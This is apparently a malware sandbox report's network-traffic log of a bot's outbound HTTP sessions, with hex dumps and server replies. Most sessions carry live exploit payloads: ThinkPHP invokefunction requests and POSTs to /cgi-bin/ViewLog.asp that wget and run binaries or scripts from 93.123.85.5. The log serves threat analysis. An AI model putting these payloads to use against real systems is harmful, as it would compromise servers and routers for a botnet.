                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              383192.168.2.233470695.46.116.5080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:07.038947105 CET8307OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:07.415407896 CET8330INHTTP/1.1 505 HTTP Version not supported
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 140
                                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              384192.168.2.235474495.101.160.5180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:07.129126072 CET8321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:07.281589985 CET8325INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:07 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:07 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 32 34 64 64 62 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 33 34 37 26 23 34 36 3b 32 39 32 62 38 34 65 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;924ddb17&#46;1699910347&#46;292b84e1</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              385192.168.2.235416095.216.0.23580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:07.348201990 CET8328OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:07.658370972 CET8333INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:19:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              386192.168.2.233622295.216.21.12680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:07.352286100 CET8329OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              387192.168.2.234377495.82.254.11380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.067817926 CET8432OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              388192.168.2.234270094.14.124.358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.116892099 CET8433OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              389192.168.2.235222295.211.95.2338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.117192030 CET8434OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.420989037 CET8462INHTTP/1.1 400 Bad Request
                                                              Server: squid
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 21:19:08 GMT
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Length: 3580
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Vary: Accept-Language
                                                              Content-Language: en
                                                              X-Cache: MISS from Amsterdam.perfect-privacy.com
                                                              X-Cache-Lookup: NONE from Amsterdam.perfect-privacy.com:8080
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              39192.168.2.234179694.131.55.398080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:14.115597963 CET1873OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:14.326725960 CET1879INHTTP/1.1 400 Bad Request
                                                              Server: squid/3.5.27
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 21:18:14 GMT
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Length: 3558
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Vary: Accept-Language
                                                              Content-Language: en
                                                              X-Cache: MISS from ubuntu
                                                              X-Cache-Lookup: NONE from ubuntu:8080
                                                              Via: 1.1 ubuntu (squid/3.5.27)
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              390192.168.2.233319262.232.102.458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.125920057 CET8435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.431898117 CET8465INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              391192.168.2.233748862.36.8.398080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.136362076 CET8445OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.447453976 CET8467INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:19:08 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              392192.168.2.235541085.214.241.1178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.136410952 CET8446OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.465421915 CET8470INHTTP/1.0 404 Not Found
                                                              Date: Mon, 13 Nov 2023 21:19:08 GMT
                                                              Server: Apache/2.4.29 (Ubuntu)
                                                              Cache-Control: no-cache, private
                                                              Content-Length: 6609
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
